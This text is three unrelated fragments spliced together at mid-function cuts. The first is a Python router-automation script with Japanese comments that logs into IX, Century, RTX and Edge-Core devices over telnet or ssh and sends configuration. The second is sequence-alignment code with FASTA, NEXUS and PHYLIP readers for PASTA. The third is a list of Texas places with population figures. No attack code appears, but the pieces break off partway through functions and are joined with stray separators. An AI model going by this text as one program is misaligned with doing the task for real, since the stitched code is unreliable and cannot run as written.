jsonstr = fp.readline()
sendlines = fp.readlines()
jsonobj = json.loads(jsonstr)
for k, v in jsonobj.items():
if (v.startswith("$") and os.getenv(v[1::])):
jsonobj[k] = os.getenv(v[1::])
return (jsonobj, sendlines)
def checkre(pfile, tfile):
with open(pfile) as f:
patternStr = f.readline().strip()
with open(tfile) as f2:
targetStr = f2.read()
return re.search(patternStr, targetStr, re.DOTALL)
class multifile(object):
def __init__(self, files):
self._files = files
def __getattr__(self, attr, *args):
return self._wrap(attr, *args)
def _wrap(self, attr, *args):
def g(*a, **kw):
for f in self._files:
res = getattr(f, attr, *args)(*a, **kw)
return res
return g
def ix_telnet_login(routerconfig, sendlines, logfilename):
'''
ix_telnet_login
IX にコンフィグ送信し、送信状態をログファイルに記録する関数
ファイルの中身は以下のような内容であるこのを期待している。1行目はJSON、2行目以降は ルータに送信したい内容
"router": "10.0.0.1", "routertype": "ix_telnet", "username": "ログインユーザー名", "password": "<PASSWORD>", "centerrouter":"", "centeruser":"", "centerpassword":"" }
show config
'''
sleepspan = 0.5
timeout = 5
logfp1 = open(logfilename, 'wb')
logfp = multifile([sys.stdout.buffer, logfp1])
child = pexpect.spawn('telnet ' + routerconfig["centerrouter"])
child.logfile_read = logfp
child.ignore_sighup = True
try:
# center router login
child.expect('login: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["centeruser"] + "\r")
child.expect('Password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["centerpassword"] + "\r")
# ユーザーログイン
child.expect('# ', timeout=timeout)
sleep(sleepspan)
child.send("telnet " + routerconfig["router"] + "\r")
child.expect('login: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["username"] + "\r")
child.expect('Password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["password"] + "\r")
child.expect('# ', timeout=timeout)
# プロンプト文字列の取得
sleep(sleepspan)
# ルータのヘッダー文字列に含まれない文字列をコメント送信することで、ヘッダーをスキップする
child.send("! non-existent-lines\r")
child.expect('non-existent-lines', timeout=timeout) # この時点では改行コードを含まない
prom = ""
prom1 = ""
while (prom1 != "#"):
prom = prom + prom1
c = child.read(1)
prom1 = chr(c[0])
# 管理者モードに変更
sleep(sleepspan)
child.send('configure' + "\r")
child.expect(prom, timeout=timeout)
sleep(sleepspan)
child.send('svintr-config' + "\r")
child.expect(prom, timeout=timeout)
# config を送信する
for line in sendlines:
if (re.match(r"^\s*$", line)):
continue
sleep(sleepspan)
child.send(line + "\r")
if (line.startswith("reload y")): # リロードはプロンプトを出力せず、先に進めない
print(colored("========reload しています。ルータの起動を待って下さい ", 'yellow'))
sleep(sleepspan * 10)
return
child.expect(prom) # 標準のタイムアウト 30秒を利用する
sleep(sleepspan)
child.send('exit' + "\r")
child.expect(prom, timeout=timeout)
sleep(sleepspan)
child.send('exit' + "\r")
sleep(sleepspan)
child.send('exit' + "\r")
sleep(sleepspan)
finally:
logfp.flush()
logfp1.close() # stdout は close したくない
child.close()
def ix_direct_login(routerconfig, sendlines, logfilename):
'''
ix_direct_login
IX にコンフィグ送信し、送信状態をログファイルに記録する関数 (ルーターを中継しない)
ファイルの中身は以下のような内容であるこのを期待している。1行目はJSON、2行目以降は ルータに送信したい内容
"router": "10.0.0.1", "routertype": "ix_direct", "username": "ログインユーザー名", "password": "<PASSWORD>" }
show config
'''
sleepspan = 0.5
timeout = 5
logfp1 = open(logfilename, 'wb')
logfp = multifile([sys.stdout.buffer, logfp1])
child = pexpect.spawn('telnet ' + routerconfig["router"])
child.logfile_read = logfp
try:
# ユーザーログイン
child.expect('login: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["username"] + "\r")
child.expect('Password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["password"] + "\r")
child.expect('# ', timeout=timeout)
# プロンプト文字列の取得
sleep(sleepspan)
# ルータのヘッダー文字列に含まれない文字列をコメント送信することで、ヘッダーをスキップする
child.send("! non-existent-lines\r")
child.expect('non-existent-lines', timeout=timeout) # この時点では改行コードを含まない
prom = ""
prom1 = ""
while (prom1 != "#"):
prom = prom + prom1
c = child.read(1)
prom1 = chr(c[0])
# 管理者モードに変更
sleep(sleepspan)
child.send('configure' + "\r")
child.expect(prom, timeout=timeout)
sleep(sleepspan)
child.send('svintr-config' + "\r")
child.expect(prom, timeout=timeout)
# config を送信する
for line in sendlines:
if (re.match(r"^\s*$", line)):
continue
sleep(sleepspan)
child.send(line + "\r")
child.expect(prom) # 標準のタイムアウト 30秒を利用する
sleep(sleepspan)
child.send('exit' + "\r")
child.expect(prom, timeout=timeout)
sleep(sleepspan)
child.send('exit' + "\r")
sleep(sleepspan)
child.send('exit' + "\r")
sleep(sleepspan)
finally:
logfp.flush()
logfp1.close() # stdout は close したくない
child.close()
def century_direct_login(routerconfig, sendlines, logfilename):
'''
century_direct_login
Century にコンフィグ送信し、送信状態をログファイルに記録する関数 (ルーターを中継しない)
ファイルの中身は以下のような内容であるこのを期待している。1行目はJSON、2行目以降は ルータに送信したい内容
"router": "10.0.0.1", "routertype": "century_direct", "username": "ログインユーザー名", "password": "<PASSWORD>" }
show config
'''
sleepspan = 0.5
timeout = 5
logfp1 = open(logfilename, 'wb')
logfp = multifile([sys.stdout.buffer, logfp1])
child = pexpect.spawn('telnet ' + routerconfig["router"])
child.logfile_read = logfp
try:
# ユーザーログイン
child.expect('login: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["username"] + "\r")
child.expect('Password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["password"] + "\r")
child.expect('#', timeout=timeout)
# プロンプト文字列の取得
sleep(sleepspan)
# ルータのヘッダー文字列に含まれない文字列をコメント送信することで、ヘッダーをスキップする
child.send("! non-existent-lines\r")
child.expect('non-existent-lines', timeout=timeout) # この時点では改行コードを含まない
prom = ""
prom1 = ""
while (prom1 != "#"):
prom = prom + prom1
c = child.read(1)
prom1 = chr(c[0])
prom = "\n"+ prom.strip() # Centuryはエコーバックの改行コードが \r
#
sleep(sleepspan)
child.send('terminal length 0' + "\r")
child.expect(prom, timeout=timeout)
# configure モード
sleep(sleepspan)
child.send('configure terminal' + "\r")
child.expect(prom, timeout=timeout)
# config を送信する
for line in sendlines:
if (re.match(r"^\s*$", line)):
continue
sleep(sleepspan)
child.send(line + "\r")
child.expect(prom) # 標準のタイムアウト 30秒を利用する
sleep(sleepspan)
child.send('exit' + "\r")
child.expect(prom, timeout=timeout)
sleep(sleepspan)
child.send('exit' + "\r")
sleep(sleepspan)
child.send('exit' + "\r")
sleep(sleepspan)
finally:
logfp.flush()
logfp1.close() # stdout は close したくない
child.close()
def rtx_telnet_login(routerconfig, sendlines, logfilename):
'''
rtx_telnet_login
RTX810, RTX1200 にコンフィグ送信し、送信状態をログファイルに記録する関数
ファイルの中身は以下のような内容であるこのを期待している。1行目はJSON、2行目以降は ルータに送信したい内容
"router": "10.0.0.1", "routertype": "rtx-telnet", "password": "<PASSWORD>", "adminpassword": "<PASSWORD>" }
show config
'''
sleepspan = 0.5
timeout = 5
logfp1 = open(logfilename, 'wb')
logfp = multifile([sys.stdout.buffer, logfp1])
child = pexpect.spawn('telnet ' + routerconfig["router"])
child.logfile_read = logfp
try:
# ユーザーログイン
child.expect('Password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["password"] + "\n")
child.expect('> ', timeout=timeout)
# プロンプト文字列の取得
sleep(sleepspan)
# ルータのヘッダー文字列に含まれない文字列をコメント送信することで、ヘッダーをスキップする
child.send("# non-existent-lines\n")
child.expect('non-existent-lines', timeout=timeout) # この時点では改行コードを含まない
prom = ""
prom1 = ""
while (prom1 != ">"):
prom = prom + prom1
c = child.read(1)
prom1 = chr(c[0])
# 管理者モードに変更
sleep(sleepspan)
child.send('administrator' + "\n")
child.expect('Password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["adminpassword"] + "\n")
child.expect(prom, timeout=timeout)
# config を送信する
for line in sendlines:
if (re.match(r"^\s*$", line)):
continue
sleep(sleepspan)
child.send(line + "\n")
child.expect(prom) # 標準のタイムアウト 30秒を利用する
sleep(sleepspan)
child.send('exit' + "\n")
child.expect(prom + '> ', timeout=timeout)
sleep(sleepspan)
child.send('exit' + "\n")
sleep(sleepspan)
finally:
logfp.flush()
logfp1.close() # stdout は close したくない
child.close()
def rtx_ssh_login(routerconfig, sendlines, logfilename):
'''
rtx_ssh_login
RTX810, RTX1200 にコンフィグ送信し、送信状態をログファイルに記録する関数
ファイルの中身は以下のような内容であるこのを期待している。1行目はJSON、2行目以降は ルータに送信したい内容
"router": "10.0.0.1", "routertype": "rtx-ssh", "username": "ログインユーザー名", "password": "<PASSWORD>", "adminpassword": "<PASSWORD>" }
show config
'''
sleepspan = 0.5
timeout = 5
logfp1 = open(logfilename, 'wb')
logfp = multifile([sys.stdout.buffer, logfp1])
child = pexpect.spawn('ssh -l ' + routerconfig["username"] + " " + routerconfig["router"])
child.logfile_read = logfp
try:
# ユーザーログイン
child.expect('password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["password"] + "\n")
child.expect('> ', timeout=timeout)
# プロンプト文字列の取得
sleep(sleepspan)
# ルータのヘッダー文字列に含まれない文字列をコメント送信することで、ヘッダーをスキップする
child.send("# non-existent-lines\n")
child.expect('non-existent-lines', timeout=timeout) # この時点では改行コードを含まない
prom = ""
prom1 = ""
while (prom1 != ">"):
prom = prom + prom1
c = child.read(1)
prom1 = chr(c[0])
# 管理者モードに変更
sleep(sleepspan)
child.send('administrator' + "\n")
child.expect('Password: ', timeout=timeout)
sleep(sleepspan)
child.send(routerconfig["adminpassword"] + "\n")
child.expect(prom, timeout=timeout)
# config を送信する
for line in sendlines:
if (re.match(r"^\s*$", line)):
continue
sleep(sleepspan)
child.send(line + "\n")
child.expect(prom) # 標準のタイムアウト 30秒を利用する
sleep(sleepspan)
child.send('exit' + "\n")
child.expect(prom + '> ', timeout=timeout)
sleep(sleepspan)
child.send('exit' + "\n")
sleep(sleepspan)
finally:
logfp.flush()
logfp1.close() # stdout は close したくない
child.close()
def edgecore_direct_login(routerconfig, sendlines, logfilename):
'''
edgecore_direct_login
Edge-Core にコンフィグ送信し、送信状態をログファイルに記録する関数
ファイルの中身は以下のような内容であるこのを期待している。1行目はJSON、2行目以降は ルータに送信したい内容
"router": "10.0.0.1", "routertype": "edgecore_telnet", "username": "ログインユーザー名", "password": "<PASSWORD>" | |
return ret
def read_file_object(self, file_obj, file_format='FASTA'):
"""Augments the matrix by reading the file object.
If duplicate sequence names are encountered then the old name will be replaced.
"""
if ( file_format.upper() == 'FASTA' ):
read_func = read_fasta
elif ( file_format.upper() == 'NEXUS' ):
read_func = read_nexus
elif ( file_format.upper() == 'PHYLIP' ):
read_func = read_phylip
elif ( file_format.upper() == 'COMPACT3' ):
read_func = read_compact3
else:
raise NotImplementedError("Unknown file format (%s) is not supported" % file_format)
for name, seq in read_func(file_obj):
self[name] = seq
def write_filepath(self, filename, file_format='FASTA', zipout=False):
"""Writes the sequence data in the specified `file_format` to `filename`"""
file_obj = open_with_intermediates(filename,'w')
if zipout:
file_obj.close()
file_obj = StringIO()
self.write(file_obj, file_format=file_format)
if zipout:
import gzip
file_obj_gz = gzip.open(filename, "wb", 6)
file_obj_gz.write(str.encode(file_obj.getvalue()))
file_obj_gz.close()
file_obj.close()
def write(self, file_obj, file_format):
"""Writes the sequence data in the specified `file_format` to `file_obj`"""
if ( file_format.upper() == 'FASTA' ):
write_func = write_fasta
elif ( file_format.upper() == 'NEXUS' ):
write_func = write_nexus
elif ( file_format.upper() == 'PHYLIP' ):
write_func = write_phylip
elif ( file_format.upper() == 'COMPACT' ):
write_func = write_compact
elif ( file_format.upper() == 'COMPACT2' ):
write_func = write_compact2
elif ( file_format.upper() == 'COMPACT3' ):
write_func = write_compact3
else:
write_func = write_fasta
write_func(self, file_obj)
def write_unaligned_fasta(self, filename):
"""Writes the sequence data without gaps as FASTA, but note that the
lines may bet "ragged".
"""
file_obj = open_with_intermediates(filename, 'w')
for name, seq in list(self.items()):
new_seq = re.sub(_INDEL, '', seq)
if new_seq != '':
file_obj.write('>%s\n%s\n' % (name, new_seq))
file_obj.close()
def unaligned(self):
"""
Returns a new alignment with all gaps and missing sequences removed.
"""
new_alignment = Alignment()
new_alignment.datatype = self.datatype
for name, seq in self.items():
new_seq = re.sub(_INDEL, '', str(seq))
if new_seq != '':
new_alignment[name] = new_seq
return new_alignment
def sub_alignment(self, sub_keys):
"Creates an new alignment with a subset of the taxa."
new_alignment = Alignment()
new_alignment.datatype = self.datatype
for key in sub_keys:
if key in self:
new_alignment[key] = self[key]
return new_alignment
def is_empty(self):
return self.__len__() < 1
def is_aligned(self):
if self.is_empty():
raise ValueError("The alignment is empty.\n")
else:
v = list(self.values())
first_seq_len = len(v[0])
return all([len(i) == first_seq_len for i in v])
def partition_info(self, base=0):
return (self.datatype, 1+base, self.sequence_length() + base)
def sequence_length(self):
if self.is_aligned():
return len(list(self.values())[0])
def max_sequence_length(self):
return max(len(re.sub(_INDEL, '', v)) for v in list(self.values()))
def from_bytearray_to_string(self):
for k,v in self.items():
self[k] = str(v)
def from_string_to_bytearray(self):
for k,v in self.items():
self[k] = bytearray(v)
def mask_gapy_sites(self,minimum_seq_requirement):
n = len(list(self.values())[0])
_LOG.debug("Masking alignment sites with fewer than %d characters from alignment with %d columns" %(minimum_seq_requirement,n))
# # The following implements row-based masking. Seems to be less efficient than column based
# masked = zip(range(0,n),[minimum_seq_requirement] * n)
# i = 0
# for seq in self.values():
# masked = filter(lambda x: x[1] > 0, ((i,c) if seq[i]=="-" else (i,c-1) for (i,c) in masked))
# if not masked:
# _LOG.debug("No column will be masked.")
# return
# if i % 1000 == 0:
# _LOG.debug("i is %d" %(i))
# i += 1
# included = filter(lambda z: z[0]!=z[1], reduce(lambda x,y: x+[(x[-1][1]+1,y[0])],masked,[(-1,-1)]))
# if included[-1][1] < n and masked[-1][0]+1 != n:
# included.append((masked[-1][0]+1,n))
# The following implements column-based masking. Seems to be more efficient than row based
masked = []
allseqs = list(self.values())
allseqs.sort(key=lambda x: x.count("-"))
for c in range(0,n):
r = minimum_seq_requirement
for seq in allseqs:
if seq[c] != "-":
r -= 1
if r <= 0:
break
if r > 0:
masked.append(c)
_LOG.debug("%d Columns identified for masking" %len(masked))
if not masked:
return
included = [z for z in reduce(lambda x,y: x+[(x[-1][1]+1,y)],masked,[(-1,-1)]) if z[0]!=z[1]]
if not included:
included.append((masked[-1]+1,n))
if included[-1][1] < n and masked[-1]+1 != n:
included.append((masked[-1]+1,n))
for k,seq in self.items():
tmp = []
for (i,j) in included:
tmp.append(seq[i:j])
self[k] = "".join(tmp)
nn = len(list(self.values())[0])
assert (len(masked) == n - nn), "Masking results is not making sense: %d %d %d" %(len(masked), n , nn)
_LOG.debug("Masking done. Before masking: %d; After masking: %d; minimum requirement: %d;" %(n,nn,minimum_seq_requirement))
def merge_in(self, she):
merge_in(self,she)
from dendropy.dataio.fastareader import FastaReader
from dendropy import datamodel
from dendropy.datamodel import datasetmodel as dataobject
from dendropy.utility.error import DataParseError
#from dendropy.dataio import fasta
class FastaCustomReader(FastaReader):
def __init__(self, **kwargs):
FastaReader.__init__(self,**kwargs)
self.simple_rows = True
def _read(self, stream,taxon_namespace_factory=None,
tree_list_factory=None,
char_matrix_factory=None,
state_alphabet_factory=None,
global_annotations_target=None):
_LOG.debug("Will be using custom Fasta reader")
taxon_set = taxon_namespace_factory(label=None)
if self.data_type is None:
raise TypeError("Data type must be specified for this schema")
char_matrix = char_matrix_factory(
self.data_type,
label=None,
taxon_namespace=taxon_set)
symbol_state_map = char_matrix.default_state_alphabet.full_symbol_state_map
if self.simple_rows:
legal_chars = "".join(sorted(str(x) for x in itertools.chain(char_matrix.default_state_alphabet.multistate_symbol_iter(),
char_matrix.default_state_alphabet.fundamental_symbol_iter())))
_LOG.debug("Legal characters are: %s" %legal_chars)
re_ilegal = re.compile(r"[^%s]" %legal_chars);
curr_vec = None
curr_taxon = None
for line_index, line in enumerate(stream):
s = line.strip()
if not s:
continue
if s.startswith('>'):
if self.simple_rows and curr_taxon and curr_vec:
char_matrix[curr_taxon] = "".join(curr_vec)
name = s[1:].strip()
if self.simple_rows:
curr_taxon = Taxon(label=name)
taxon_set.append(curr_taxon)
if curr_taxon in char_matrix:
raise DataParseError(message="FASTA error: Repeated sequence name ('{}') found".format(name), line_num=line_index + 1, stream=stream)
else:
curr_taxon = taxon_namespace.require_taxon(label=name)
if curr_taxon in char_matrix:
raise DataParseError(message="FASTA error: Repeated sequence name ('{}') found".format(name), line_num=line_index + 1, stream=stream)
if curr_vec is not None and len(curr_vec) == 0:
raise DataParseError(message="FASTA error: Expected sequence, but found another sequence name ('{}')".format(name), line_num=line_index + 1, stream=stream)
if self.simple_rows:
#_LOG.debug(".")
curr_vec = []
else:
curr_vec = char_matrix[curr_taxon]
elif curr_vec is None:
raise DataParseError(message="FASTA error: Expecting a lines starting with > before sequences", line_num=line_index + 1, stream=stream)
elif not self.simple_rows:
states = []
for col_ind, c in enumerate(s):
c = c.strip()
if not c:
continue
try:
state = symbol_state_map[c]
except KeyError:
raise DataParseError(message="Unrecognized sequence symbol '{}'".format(c), line_num=line_index + 1, col_num=col_ind + 1, stream=stream)
states.append(state)
curr_vec.extend(states)
else:
m = re_ilegal.search(s)
if m:
raise DataParseError(message='Unrecognized sequence symbol "%s" (check to make sure the --datatype is set properly)' % m.group(0), line_num=line_index + 1, col_num=m.start(), stream=stream)
curr_vec.append(s)
if self.simple_rows and curr_taxon and curr_vec:
char_matrix[curr_taxon] = "".join(curr_vec)
#_LOG.debug("Custom reader finished reading string; %d building product" % len(char_matrix))
# product = self.Product(
# taxon_namespaces=None,
# tree_lists=None,
# char_matrices=[char_matrix])
_LOG.debug("Custom reader finished reading alignment with %d sequences ." %len(char_matrix))
return char_matrix
class DNACustomFastaReader(FastaCustomReader):
def __init__(self, **kwargs):
FastaCustomReader.__init__(self, data_type="dna", **kwargs)
class RNACustomFastaReader(FastaCustomReader):
def __init__(self, **kwargs):
FastaCustomReader.__init__(self, data_type="rna", **kwargs)
class ProteinCustomFastaReader(FastaCustomReader):
def __init__(self, **kwargs):
FastaCustomReader.__init__(self, data_type="protein", **kwargs)
import dendropy
from dendropy.dataio import register_reader
register_reader("fasta", FastaCustomReader)
register_reader("dnafasta", DNACustomFastaReader)
register_reader("rnafasta", RNACustomFastaReader)
register_reader("proteinfasta", ProteinCustomFastaReader)
class SequenceDataset(object):
"""Class for creating a dendropy reader, validating the input, and
keeping mapping of real taxa names to "safe" versions that will not
cause problems for our alignment and tree tools.
The general order of calls should be:
############################################################################
# Initialization
############################################################################
sd = SequenceDataset()
sd.read(file_obj, file_format='FASTA', datatype=datatype)
############################################################################
# Check matrix
############################################################################
assert sd.sequences_are_valid(remap_missing, map_missing_to)
############################################################################
# read trees before changing taxa names
############################################################################
tree_list = sd.dataset.read_trees(tree_f, 'NEWICK', encode_splits=True)
############################################################################
# Go to safe labels
############################################################################
md = MultiLocusDataset([sd])
md.relabel_for_pasta()
############################################################################
# use the dataset object
############################################################################
job = PastaJob(multilocus_dataset=md,
pasta_team=pasta_team,
name=options.jobname,
dataset=sd.dataset
)
job.tree = tree_list[0]
job.run(tmp_dir_par=temporaries_dir)
############################################################################
# restore the original names to change the dataset object held by the job
############################################################################
sd.restore_taxon_names()
############################################################################
# get the tree with the original labels
############################################################################
tree_str = job.tree.as_newick_str()
"""
def __init__(self):
self.dataset = None
self.alphabet = None
self.safe_to_real_names = {}
self.datatype = None
self.filename = '<unknown>'
def get_character_matrix(self):
"""Returns the first character matrix or raises IndexError if no
characters have been read."""
return self.dataset.char_matrices[0]
character_matrix = property(get_character_matrix)
def get_taxa_block(self):
"""Returns the list of taxa."""
return getattr(self.dataset, DATASET_TAXA_ATTR)[0]
taxa = property(get_taxa_block)
def read(self, file_obj, file_format='FASTA', datatype=None, filename='<unknown>', careful_parse=False):
"""If the datatype is fasta (or some other type that does not
specify the type of data, then the datatype arg should be DNA, RNA
or 'PROTEIN'
"""
_LOG.debug("using read function from SequenceDataset class with careful_parse = %s" %careful_parse)
self.filename = filename
fup = file_format.upper()
amibig_formats = ['FASTA']
if fup in amibig_formats:
if not datatype:
raise ValueError('datatype must be specified when the file_format is %s' % fup)
dup = datatype.upper()
datatype_list = ['DNA', 'RNA', 'PROTEIN']
if not dup in datatype_list:
raise ValueError('Expecting the datatype to be DNA, RNA or PROTEIN')
file_format = dup + file_format
try:
self.dataset = dendropy.DataSet()
if careful_parse:
self.dataset.read(file=file_obj, schema=file_format)
else:
#self.dataset.read(file_obj, schema=file_format, row_type='str')
self.dataset.read(file=file_obj, schema=file_format)
# | |
city, Texas",8193),
("Alba town, Texas",774),
("Albany city, Texas",1840),
("Aldine CDP, Texas",15822),
("Aledo city, Texas",3817),
("Alfred CDP, Texas",0),
("Alice city, Texas",19146),
("Alice Acres CDP, Texas",188),
("Allen city, Texas",99255),
("Alma town, Texas",359),
("Alpine city, Texas",5992),
("Alto town, Texas",1242),
("Alto Bonito Heights CDP, Texas",194),
("Alton city, Texas",16566),
("Alvarado city, Texas",4044),
("Alvin city, Texas",26154),
("Alvord town, Texas",1165),
("Amada Acres CDP, Texas",0),
("Amargosa CDP, Texas",100),
("Amarillo city, Texas",198773),
("Amaya CDP, Texas",42),
("Ames city, Texas",1247),
("Amherst city, Texas",796),
("Amistad CDP, Texas",23),
("Anacua CDP, Texas",8),
("Anahuac city, Texas",2327),
("Anderson city, Texas",223),
("Andrews city, Texas",13525),
("Angleton city, Texas",19410),
("Angus city, Texas",515),
("Anna city, Texas",12271),
("Annetta town, Texas",3014),
("Annetta North town, Texas",598),
("Annetta South town, Texas",534),
("Annona town, Texas",358),
("Anson city, Texas",2076),
("Anthony town, Texas",5578),
("Anton city, Texas",1123),
("Appleby city, Texas",588),
("Aquilla city, Texas",148),
("Aransas Pass city, Texas",8113),
("Archer City city, Texas",1772),
("Arcola city, Texas",2221),
("Argyle city, Texas",3988),
("Arlington city, Texas",392462),
("Arp city, Texas",941),
("Arroyo Colorado Estates CDP, Texas",567),
("Arroyo Gardens CDP, Texas",108),
("Asherton city, Texas",832),
("Aspermont town, Texas",908),
("Atascocita CDP, Texas",79019),
("Athens city, Texas",12677),
("Atlanta city, Texas",5523),
("Aubrey city, Texas",3313),
("Aurora city, Texas",1498),
("Austin city, Texas",935755),
("Austwell city, Texas",120),
("Avery town, Texas",518),
("Avinger town, Texas",251),
("Azle city, Texas",12149),
("Bacliff CDP, Texas",10649),
("Bailey city, Texas",260),
("Bailey's Prairie village, Texas",759),
("Baird city, Texas",1720),
("Balch Springs city, Texas",25312),
("Balcones Heights city, Texas",3185),
("Ballinger city, Texas",3669),
("Balmorhea city, Texas",609),
("B and E CDP, Texas",422),
("Bandera city, Texas",805),
("Bangs city, Texas",1470),
("Banquete CDP, Texas",389),
("Bardwell city, Texas",623),
("Barrera CDP, Texas",83),
("Barrett CDP, Texas",3691),
("Barry city, Texas",261),
("Barstow city, Texas",522),
("Bartlett city, Texas",2002),
("Barton Creek CDP, Texas",2928),
("Bartonville town, Texas",1839),
("Bastrop city, Texas",8736),
("Batesville CDP, Texas",1274),
("Bay City city, Texas",17681),
("Bayou Vista city, Texas",1658),
("Bayside town, Texas",417),
("Baytown city, Texas",76581),
("Bayview town, Texas",417),
("Beach City city, Texas",2620),
("Bear Creek village, Texas",390),
("Beasley city, Texas",606),
("Beaumont city, Texas",118632),
("Beckville city, Texas",928),
("Bedford city, Texas",49306),
("Bedias city, Texas",334),
("Bee Cave city, Texas",6521),
("Beeville city, Texas",13044),
("Bellaire city, Texas",18733),
("Bellevue city, Texas",360),
("Bellmead city, Texas",10431),
("Bells town, Texas",1385),
("Bellville city, Texas",4234),
("Belton city, Texas",21123),
("Benavides city, Texas",1840),
("Benbrook city, Texas",22961),
("Benjamin city, Texas",200),
("<NAME> CDP, Texas",161),
("Berryville town, Texas",1203),
("Bertram city, Texas",1731),
("Beverly Hills city, Texas",2398),
("Bevil Oaks city, Texas",1283),
("Bigfoot CDP, Texas",286),
("Big Lake city, Texas",3324),
("Big Sandy town, Texas",1747),
("Big Spring city, Texas",28367),
("Big Thicket Lake Estates CDP, Texas",582),
("Big Wells city, Texas",850),
("Bishop city, Texas",3112),
("Bishop Hills town, Texas",297),
("Bixby CDP, Texas",471),
("Blackwell city, Texas",231),
("Blanco city, Texas",2550),
("Blanket town, Texas",346),
("Blessing CDP, Texas",660),
("Bloomburg town, Texas",562),
("Blooming Grove town, Texas",704),
("Bloomington CDP, Texas",1855),
("Blossom city, Texas",1505),
("Blue Berry Hill CDP, Texas",625),
("Blue Mound city, Texas",3398),
("Blue Ridge city, Texas",1012),
("Bluetown CDP, Texas",482),
("Blum town, Texas",373),
("Boerne city, Texas",14799),
("Bogata city, Texas",1190),
("Boling CDP, Texas",916),
("Bolivar Peninsula CDP, Texas",2333),
("Bonanza Hills CDP, Texas",127),
("Bonham city, Texas",10106),
("Bonney village, Texas",246),
("Booker town, Texas",1401),
("Borger city, Texas",12856),
("Botines CDP, Texas",22),
("Bovina city, Texas",1439),
("Bowie city, Texas",5059),
("Box Canyon CDP, Texas",43),
("Boyd town, Texas",1360),
("Boys Ranch CDP, Texas",509),
("Brackettville city, Texas",1831),
("Brady city, Texas",5371),
("Brazoria city, Texas",3094),
("Brazos Bend city, Texas",382),
("Brazos Country city, Texas",577),
("Breckenridge city, Texas",5479),
("Bremond city, Texas",875),
("Brenham city, Texas",16778),
("Briar CDP, Texas",4685),
("Briarcliff village, Texas",1576),
("Briaroaks city, Texas",563),
("Bridge City city, Texas",8004),
("Bridgeport city, Texas",6406),
("Bristol CDP, Texas",484),
("Broaddus town, Texas",269),
("Bronte town, Texas",945),
("Brookshire city, Texas",5199),
("Brookside Village city, Texas",1814),
("Browndell city, Texas",304),
("Brownfield city, Texas",9596),
("Brownsboro city, Texas",1165),
("Brownsville city, Texas",182679),
("Brownwood city, Texas",18820),
("Bruceville-Eddy city, Texas",1509),
("Brundage CDP, Texas",0),
("Bruni CDP, Texas",294),
("Brushy Creek CDP, Texas",20024),
("Bryan city, Texas",83199),
("Bryson city, Texas",551),
("Buchanan Dam CDP, Texas",1466),
("Buchanan Lake Village CDP, Texas",856),
("Buckholts town, Texas",435),
("Buda city, Texas",14503),
("Buena Vista CDP, Texas",54),
("Buffalo city, Texas",1949),
("Buffalo Gap town, Texas",545),
("Buffalo Springs village, Texas",488),
("Bullard town, Texas",3039),
("Bulverde city, Texas",5104),
("Buna CDP, Texas",1891),
("Bunker Hill Village city, Texas",3966),
("Burkburnett city, Texas",11170),
("Burke city, Texas",800),
("Burleson city, Texas",44629),
("Burnet city, Texas",6216),
("Burton city, Texas",560),
("Butterfield CDP, Texas",4),
("Byers city, Texas",517),
("Bynum town, Texas",284),
("Cactus city, Texas",3205),
("Caddo Mills city, Texas",1731),
("Caldwell city, Texas",4302),
("Callender Lake CDP, Texas",1300),
("Callisburg city, Texas",391),
("Calvert city, Texas",1249),
("Camargito CDP, Texas",447),
("Cameron city, Texas",5455),
("Cameron Park CDP, Texas",6226),
("Campbell city, Texas",738),
("Campo Verde CDP, Texas",105),
("Camp Swift CDP, Texas",6553),
("Camp Wood city, Texas",1041),
("Canadian city, Texas",3138),
("Caney City town, Texas",134),
("Canton city, Texas",3757),
("Cantu Addition CDP, Texas",116),
("Canutillo CDP, Texas",5061),
("Canyon city, Texas",15182),
("Canyon Creek CDP, Texas",1306),
("Canyon Lake CDP, Texas",25104),
("Cape Royale CDP, Texas",445),
("Carbon town, Texas",296),
("Carlsbad CDP, Texas",574),
("Carl's Corner town, Texas",180),
("Carmine city, Texas",177),
("Carrizo Hill CDP, Texas",965),
("Carrizo Springs city, Texas",5676),
("Carrollton city, Texas",133438),
("Carthage city, Texas",6646),
("Casa Blanca CDP, Texas",0),
("Casas CDP, Texas",27),
("Cashion Community city, Texas",274),
("Castle Hills city, Texas",4422),
("Castroville city, Texas",2970),
("Catarina CDP, Texas",162),
("Cedar Hill city, Texas",48704),
("Cedar Park city, Texas",72415),
("Cedar Point CDP, Texas",806),
("Celeste city, Texas",873),
("Celina city, Texas",9354),
("Center city, Texas",5319),
("Centerville city, Texas",1092),
("Central Gardens CDP, Texas",4197),
("<NAME> CDP, Texas",1374),
("Chandler city, Texas",2959),
("Channelview CDP, Texas",41930),
("Channing city, Texas",265),
("Chaparrito CDP, Texas",71),
("Chapeno CDP, Texas",23),
("Charlotte city, Texas",1605),
("Chester town, Texas",333),
("Chico city, Texas",1282),
("Childress city, Texas",6203),
("Chillicothe city, Texas",764),
("Chilton CDP, Texas",736),
("China city, Texas",979),
("China Grove town, Texas",1241),
("China Spring CDP, Texas",990),
("Chireno city, Texas",446),
("Christine town, Texas",300),
("Christoval CDP, Texas",401),
("Chula Vista CDP (Cameron County), Texas",499),
("Chula Vista CDP (Maverick County), Texas",3922),
("Chula Vista CDP (Zavala County), Texas",1126),
("Cibolo city, Texas",27963),
("Cienegas Terrace CDP, Texas",3489),
("Cinco Ranch CDP, Texas",16977),
("Circle D-KC Estates CDP, Texas",2674),
("Cisco city, Texas",3766),
("Citrus City CDP, Texas",3275),
("Clarendon city, Texas",1961),
("Clarksville city, Texas",3198),
("Clarksville City city, Texas",744),
("Claude city, Texas",1274),
("Clear Lake Shores city, Texas",1140),
("Cleburne city, Texas",29878),
("Cleveland city, Texas",7998),
("Clifton city, Texas",3369),
("Clint town, Texas",718),
("Cloverleaf CDP, Texas",24953),
("Clute city, Texas",11524),
("Clyde city, Texas",3801),
("Coahoma town, Texas",819),
("Cockrell Hill city, Texas",4268),
("Coffee City town, Texas",264),
("Coldspring city, Texas",984),
